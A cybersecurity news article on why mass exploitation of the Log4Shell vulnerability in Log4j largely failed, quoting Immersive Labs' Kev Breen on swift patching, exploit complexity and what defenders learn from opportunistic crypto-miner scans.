Log4Shell – why mass exploitation failed and the lessons that can be learned from those who tried

The impact of the Log4Shell bug – which threatened to wreak havoc on businesses worldwide when it was first discovered in December – has been limited thanks to the swift reaction of the industry as well as the code being harder for criminals to exploit than was first anticipated.

Before Christmas, a vulnerability in Apache’s widely used Java-based logging utility Log4J – which was dubbed Log4Shell – sent the industry into a tailspin.

Yet mass exploitation of the bug appears to have failed – with one of the few reported exceptions including the VMware Horizon servers used by the NHS.

According to Kev Breen, director of cyber threat research at Immersive Labs, while there’s been “a lot of noise” and opportunist scatter gun attacks exploiting the vulnerability – fortunately for businesses there have been very few successful ones.

Breen believes that the reason for this is twofold. Firstly because enterprises took swift action, guided by their security teams working weekends to install patches, exploitations were mitigated.

“Our response to shell as an industry was swift. And most SaaS suppliers will have had emails from their customers asking them to provide formal legal statements on exactly where, how and if they are looking for the Log4Shell bug. So that unified response will have played a part in it not of having had a wider impact,” Breen explains.

Another reason for the lack of wide scale breaches, he adds, is down to the unanticipated complexity involved in using the vulnerability to attack firms.

“The more we get into how this vulnerability works, the specific remote code execution side of this, which is the thing that the attackers really wanted – it was a bit more complex that people thought.”

“On the surface it felt like a really simple, trivial vulnerability to exploit. And in part that’s true. But to actually, to gain code execution, you had to be very familiar with the obligation that you’re targeting. And opportunist attackers don’t really have that kind of visibility,” says Breen.

Attempted breaches – key learnings

Breen adds that detection tools for the Log4Shell bug were released within hours of it first being reported and that these have been phenomenally successful in picking up attempted attacks which the whole cyber security community can learn from.

Security solutions firm Sophos released a blog this week which analysed the types of attacks the industry was seeing from Log4Shell.

The data reveals that many of the initial scans for vulnerabilities and subsequent proof of concepts were coming from opportunist, financially motivated crypto miners who write automated scripting tooling and aim it at every IP address and port that they can find.

“If we look back over the last year crypto miners have tried to exploit all major vulnerabilities that we’ve seen including SaltStack and MS Exchange. They write a lot of automated scripting tools and just point it at the Internet and go. So it’s not targeted and it’s low effort for them. The success rate is low but the yield is high.”

According to Breen, the good news is that the crypto miners’ scatter gun approach is actually useful for the security community, in terms of helping them understand attackers behaviour

“It generates a wealth of information for us. We live in our bubble and know how we would modify things, but we don’t necessarily know how attackers think all the time. Now we can look at their approach and the tricks they use and this can help us write new detections.”